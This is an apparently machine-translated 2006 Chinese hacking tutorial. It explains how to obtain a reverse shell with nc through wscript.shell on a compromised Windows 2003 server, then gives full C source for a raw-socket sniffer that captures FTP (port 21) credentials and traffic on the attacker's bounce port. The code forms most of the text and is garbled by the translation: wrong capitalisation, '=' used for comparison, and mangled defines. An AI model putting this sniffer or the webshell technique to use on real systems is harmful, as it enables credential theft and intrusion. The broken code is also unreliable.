Lab environment:
Windows2003 SERVER + ocean 2006 + serv-u5.2
The server cannot directly use cmd.exe, but can use the wscript. shell component to execute the command after uploading.
Tutorial steps:
1. Execute the nc rebound using wcript. shell to get the shell
2. Use a self-Writing Tool for sniffing (I only sniff 21 and 9001, of which 21 is ftp and 9001 is the bounce port)
/*------------------------------------------------------
* FIle: SnifferFtp. c
* Effect: used for sniffing experiments in webshell, based on Raw
* Code: Huai_Huai
* Page: Http: // hhuai.cn
* Date: 2006.1.12
*-----------------------------------------------------*/
# Include <stdio. h>
# Include <string. h>
# Include "Winsock2.h"
# Pragma comment (lib, "WS2_32.lib ")
# Define SIO_RCVALL _ WSAIOW (IOC_VENDOR, 1)
# Define STATUS_FAILED 0 xFFFF
# Define MAX_PACK_LEN 65535
# Define MAX_ADDR_LEN 16
# Define MAX_HOSTNAME_LEN 255
// Define the ip Header
Typedef struct _ iphdr
{
Byte ver_len; // version 4-bit, header length 4-bit, header length in 32-bit unit
Byte type; // type 8-bit
Byte length [2]; // The total length, which is 16 bits, indicating the total length of the packet in bytes.
// The message length cannot exceed 65536 characters. Otherwise, the message is considered damaged.
Byte id [2]; // Message id, used for more than 16 bytes
Byte flag_offset [2]; // flag, with a 3-bit data block offset of 13 digits
Byte time; // survival time, 8 bits
Byte protocol; // protocol, 8-bit
Byte crc_val [2]; // header checksum, 16 bits
Byte src_addr [4]; // source address, 32-bit
Byte tar_addr [4]; // target address, 32-bit
Byte options [4]; // options and fill, 32-bit
} IP_HEADER;
Typedef struct _ tcphdr
{
Byte source_port [2]; // sending terminal slogan, 16-bit
Byte dest_port [2]; // acceptor port number, 16 bits
Byte sequence_no [4]; // 32-bit, indicating that the data of the Message end is located in a certain byte Number of all data blocks
Byte ack_no [4]; // 32-bit, confirmation number, indicating the number of data blocks received by the receiver
Unsigned char offset_reser_con; // The data offset is 4 bits. The reserved value is 6 bits and the control bits are 6 bits.
Unsigned char th_flag;
Byte window [2]; // window 16 bits
Byte checksum [2]; // check code, 16 bits
Byte urgen_pointer [2]; // 16-bit, emergency Data Pointer
Byte options [3]; // you can specify a 32-bit padding mode.
} TCP_HEADER;
# Define PROTOCOL_ICMP 1 // Transmission Control Protocol
# Define PROTOCOL_GTG 3 // Gateway-to-Gateway
# Define PROTOCOL_CGMM 4 // CMCC Gateway Monitoring Message
# Define PROTOCOL_ST 5 // ST
# Define PROTOCOL_TCP 6 // Transmission Control Protocol
# Define PROTOCOL_UCL 7 // UCL
# Define PROTOCOL_SECURE 9 // secure
# Define PROTOCOL_BRM 10 // bbn rcc Monitoring
# Define PROTOCOL_NVP 11 // NVp
# Define PROTOCOL_PUP 12 // PUP
# Define PROTOCOL_PLURIBUS 13 // Pluribus
# Define PROTOCOL_TELENET 14 // Telenet
# Define PROTOCOL_XNET 15 // XNET
# Define PROTOCOL_CHAOS 16 // Chaos
# Define PROTOCOL_UDP 17 // UDP
# Define PROTOCOL_MULTIPLEXING 18 // Multiplexing
# Define PROTOCOL_DCN 19 // DCN
# Define PROTOCOL_TAC_MONITORING 20 // TAC Monitoring
# Define protocol_a163 // any local network
# Define PROTOCOL_SATNET 64 // SATNET and Backroom EXPAK
# Define PROTOCOL_MITSS 65 // MIT Subnet Support
# Define PROTOCOL_SATNET_MONIT 69 // SATNET Monitoring
# Define PROTOCOL_IPCU 71 // Internet Packet Core Utility
# Define PROTOCOL_BK_SATNET_MONI 76 // Backroom SATNET Monitoring
# Define PROTOCOL_WIDEBAND_MONI 78 // WIDEBAND Monitoring
# Define PROTOCOL_WIDEBAND_EXPAK 79 // WIDEBAND EXPAK
SOCKET SocketRaw;
Void startsniffer ()
{
Char RecvBuf [MAX_PACK_LEN] = {0 };
Char FAR name [MAX_HOSTNAME_LEN];
WSADATA wsa;
Struct hostent FAR * pHostent;
SOCKADDR_IN sa;
DWORD OutBuffer [10];
DWORD InBuffer = 1;
DWORD BytesReturned = 0;
If (WSAStartup (MAKEWORD (2, 2), & wsa )! = 0)
{
Printf ("Winsock DLL cannot be loaded! ");
Exit (0 );
}
SocketRaw = socket (AF_INET, SOCK_RAW, IPPROTO_IP );
If (SocketRaw = INVALID_SOCKET)
{
Printf ("cannot create Socket! ");
Exit (0 );
}
Gethostname (name, MAX_HOSTNAME_LEN );
// Memory is automatically allocated here
PHostent = gethostbyname (name );
Sa. sin_family = AF_INET;
Sa. sin_port = htons (6000 );
Memcpy (& sa. sin_addr.S_un.S_addr, pHostent-> h_addr_list [0], pHostent-> h_length );
If (bind (SocketRaw, (PSOCKADDR) & sa, sizeof (sa ))! = 0)
{
Printf ("cannot bind Nic! ");
Closesocket (SocketRaw );
Exit (0 );
}
If (WSAIoctl (SocketRaw, SIO_RCVALL, & InBuffer, sizeof (InBuffer ),
& OutBuffer, sizeof (OutBuffer), & BytesReturned, NULL, NULL )! = 0)
{
Printf ("WSAIoctl cannot be created! ");
Closesocket (SocketRaw );
Exit (0 );
}
}
Int ReceiveBuf (byte * buf, int len)
{
Return recv (SocketRaw, (char *) buf, len, 0 );
}
Void main ()
{
Int len;
Byte RecvBuf [65535];
Char buf [16];
Int iphdr_len;
TCP_HEADER * pTcpHeader;
Unsigned _ int16 src_port;
Unsigned _ int16 dest_port;
Int HdrLen;
_ Int16 datalen;
IP_HEADER * pIpheader;
Int port1, port2;
Startsniffer ();
While (TRUE)
{
Port1 = port2 = 0;
Memset (RecvBuf );
Len = ReceiveBuf (RecvBuf, 65535 );
If (len> 0)
{
PIpheader = (IP_HEADER *) RecvBuf;
/*
Switch (pIpheader-> protocol)
{
Case PROTOCOL_ICMP:
Printf ("ICMP ");
Break;
Case PROTOCOL_TCP:
Printf ("TCP ");
Break;
Case PROTOCOL_UDP:
Printf ("UDP ");
Break;
Default:
Printf ("other protocols ");
Break;
}
*/
If (pIpheader-> protocol = PROTOCOL_TCP)
{
Iphdr_len = (pIpheader-> ver_len & 0xf) * 4;
PTcpHeader = (TCP_HEADER *) (RecvBuf + iphdr_len );
Src_port = pTcpHeader-> source_port [0] * 0x100 + pTcpHeader-> source_port [1];
Dest_port = pTcpHeader-> dest_port [0] * 0x100 + pTcpHeader-> dest_port [1];
Memset (buf, 0, 16 );
Sprintf (buf, "% d", src_port );
Port1 = src_port;
// Printf ("% s", buf );
Memset (buf, 0, 16 );
Sprintf (buf, "% d", dest_port );
Port2 = dest_port;
// Printf ("% s", buf );
If (port1 = 21 | port2 = 21 | port1 = 9001 | port2 = 9001)
{
HdrLen = (pTcpHeader-> offset_reser_con)> 2;
Memset (buf, 0, 16 );
Sprintf (buf, "% s", (BYTE *) pTcpHeader) + HdrLen );
// Printf ("% s", buf );
Memset (buf, 0, 16 );
Sprintf (buf, "% d. % d. % d. % d ", pIpheader-> src_addr [0], pIpheader-> src_addr [1], pIpheader-> src_addr [2], pIpheader-> src_addr [3]);
// Printf ("% s", buf );
Memset (buf, 0, 16 );
Sprintf (buf, "% d. % d. % d. % d ", pIpheader-> tar_addr [0], pIpheader-> tar_addr [1], pIpheader-> tar_addr [2], pIpheader-> tar_addr [3]);
// Printf ("% s", buf );
Datalen = pIpheader-> length [0] * 0x100 + pIpheader-> length [1];
Memset (buf, 0, 16 );
Sprintf (buf, "% d", datalen );
// Printf ("% s", buf );
HdrLen = (pTcpHeader-> offset_reser_con)> 2;
Memset (buf, 0, 16 );
Sprintf (buf, "% s", (BYTE *) pTcpHeader) + HdrLen );
Printf ("% s", buf );
// Printf ("\ n ");
}
}
}
}
}
3. Sniffing results:
= 800) window. open (/pic/22/a2006-3-1-621a6f.jpg); "src ="/college/UploadPic/2006/8/27/2006827234138485 .jpg" onload = "if (this. width> 800) this. width = 800; if (this. height> 800) this. height = 800; "border = 0>
4. Experiment summary:
Some information can indeed be sniffed, And the ftp password can be sniffed in winxp sp2 on the local machine. However, when running on win2003 server, only the user name can be sniffed, and some operations can also be sniffed by webshell, for example, user directory or something.
Our webshell permissions can be very low, as long as we can use wscript. shell.
There are many details, which need to be carefully studied in the future. Hope that the Forum experts can give a tip (source: the evil Information Security Team Author: Bad)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
